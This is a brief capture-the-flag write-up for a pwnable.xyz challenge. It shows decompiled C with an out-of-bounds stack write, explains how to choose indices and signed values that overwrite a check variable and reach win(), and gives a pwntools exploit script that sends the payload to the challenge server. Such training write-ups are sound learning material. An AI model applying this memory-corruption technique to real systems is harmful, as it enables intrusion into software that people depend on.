int __cdecl main(int argc, const char **argv, const char **envp)
{
__int64 s[20]; // [rsp+10h] [rbp-A0h] BYREF
s[19] = __readfsqword(0x28u);
setup();
memset(s, 0, 0x98uLL);
*(&s[1] + 7) = 0xDEADBEEFLL;
while ( _isoc99_scanf("%ld %ld %ld", &s[4], &s[5], &s[6]) == 3 && s[6] <= 9 && s[6] >= -7 )
{
s[s[6] + 7] = s[4] + s[5];
printf("Result: %ld\\n", s[s[6] + 7]);
}
if ( *(&s[1] + 7) == 0xB000000B5LL )
win();
return 0;
}
It’s similar to previous chall, add
but range of s[6] is -7 ~ 9 so we can manipulate return address and PIE is also applied.
and also, to make *(&s[1]+7) to 0xB000000B5,
s[2] should be set to 0xB000000 ( 184549376 ),
s[1] to 0xB500000000000000 ( -5404319552844595200 )
s is not unsigned, so convert 0xb5 ~ to signed
to convert unsigned to signed, import ctypes and
ctypes.c_int64(0xb5~~~).value this will return signed int
in s[s[6]+7] = s[4]+s[5], to change value of s[1], s[6] should be -6
and s[2], s[6] is [-5]
ex.py
from pwn import *
r=remote("svc.pwnable.xyz",30003)
r.sendline(b"0 184549376 -5")
r.sendline(b"0 -5404319552844595200 -6")
r.sendline(b".")
r.interactive()
